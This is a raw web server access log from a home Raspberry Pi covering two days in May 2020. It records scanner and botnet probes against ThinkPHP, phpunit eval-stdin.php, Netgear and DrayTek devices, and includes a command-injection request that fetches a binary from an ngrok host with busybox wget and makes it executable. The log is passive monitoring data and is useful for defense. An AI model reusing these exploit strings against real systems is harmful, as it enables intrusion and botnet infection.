Fri May  8 06:25:07 MDT 2020
 06:25:07 up 73 days, 10:53,  1 user,  load average: 0.31, 0.27, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 73days  1:27m  2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE
92.118.160.57 - - [08/May/2020:12:32:13 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
193.42.99.162 - - [08/May/2020:12:57:31 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
193.42.99.162 - - [08/May/2020:12:57:31 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
195.54.160.121 - - [08/May/2020:13:15:32 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [08/May/2020:13:24:18 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [08/May/2020:13:24:19 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [08/May/2020:13:36:00 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.188.206.50 - - [08/May/2020:14:15:23 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
87.213.242.179 - - [08/May/2020:15:02:47 +0000] "GET / HTTP/1.0" 200 25000 "" ""
34.87.253.204 - - [08/May/2020:15:05:01 +0000] "UNKNOWN  HTTP/1.0" 501 0 "" ""
162.243.137.232 - - [08/May/2020:15:49:51 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
195.54.160.121 - - [08/May/2020:16:05:54 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.165.152.218 - - [08/May/2020:16:35:22 +0000] "GET / HTTP/1.1" 400 0 "" ""
92.63.194.30 - - [08/May/2020:17:10:58 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
89.248.171.97 - - [08/May/2020:19:06:59 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.243.137.209 - - [08/May/2020:19:21:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
183.56.152.172 - - [08/May/2020:19:44:19 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
103.109.179.74 - - [08/May/2020:20:01:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
213.174.0.104 - - [08/May/2020:20:18:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
104.199.36.222 - - [08/May/2020:20:30:43 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.23.0"
46.52.205.37 - - [08/May/2020:21:11:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
189.115.191.170 - - [08/May/2020:22:01:32 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0"
189.115.191.170 - - [08/May/2020:22:01:36 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
24.228.59.71 - - [08/May/2020:22:21:36 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
24.228.59.71 - - [08/May/2020:22:21:36 +0000] "GET / HTTP/1.1" 200 25000 "" ""
103.10.208.230 - - [08/May/2020:23:06:54 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
103.10.208.230 - - [08/May/2020:23:06:55 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
103.10.208.230 - - [08/May/2020:23:06:55 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
103.10.208.230 - - [08/May/2020:23:06:57 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.153.196.245 - - [08/May/2020:23:27:12 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
45.46.222.55 - - [09/May/2020:01:03:38 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
45.46.222.55 - - [09/May/2020:01:03:38 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
144.202.106.32 - - [09/May/2020:03:03:15 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
195.54.160.121 - - [09/May/2020:03:20:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
78.11.66.190 - - [09/May/2020:03:23:54 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.121 - - [09/May/2020:03:34:03 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:03:34:04 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:03:53:29 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.243.140.252 - - [09/May/2020:03:55:02 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
193.42.99.162 - - [09/May/2020:04:05:26 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
193.42.99.162 - - [09/May/2020:04:05:26 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
96.65.72.247 - - [09/May/2020:05:30:10 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
96.65.72.247 - - [09/May/2020:05:30:12 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
203.205.34.110 - - [09/May/2020:06:04:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
137.59.16.179 - - [09/May/2020:07:21:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
2.184.39.127 - - [09/May/2020:07:32:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.54.160.121 - - [09/May/2020:07:43:28 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
190.92.26.74 - - [09/May/2020:07:53:58 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
190.92.26.74 - - [09/May/2020:07:53:58 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.100.87.248 - - [09/May/2020:08:34:31 +0000] "GET / HTTP/1.0" 200 25000 "" ""
185.100.87.248 - - [09/May/2020:08:36:26 +0000] "GET /nmaplowercheck1589013386 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:27 +0000] "GET /HNAP1 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:28 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:29 +0000] "GET /evox/about HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:29 +0000] "GET / HTTP/1.0" 200 25000 "" ""
185.100.87.248 - - [09/May/2020:08:36:29 +0000] "POST /sdk HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
185.100.87.248 - - [09/May/2020:08:36:30 +0000] "GET / HTTP/1.1" 200 25000 "" ""
52.168.139.229 - - [09/May/2020:09:42:26 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
52.168.139.229 - - [09/May/2020:09:42:26 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
195.54.160.121 - - [09/May/2020:10:26:18 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:26:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:26:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:27:49 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:10:39:51 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:11:08:02 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [09/May/2020:11:13:15 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
37.49.230.180 - - [09/May/2020:11:38:47 +0000] "GET /cgi-bin/nobody/ HTTP/1.0" 404 0 "" ""
61.219.11.153 - - [09/May/2020:12:21:52 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
Sat May  9 06:25:07 MDT 2020
 06:25:08 up 74 days, 10:53,  1 user,  load average: 0.28, 0.24, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 74days  1:27m  2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE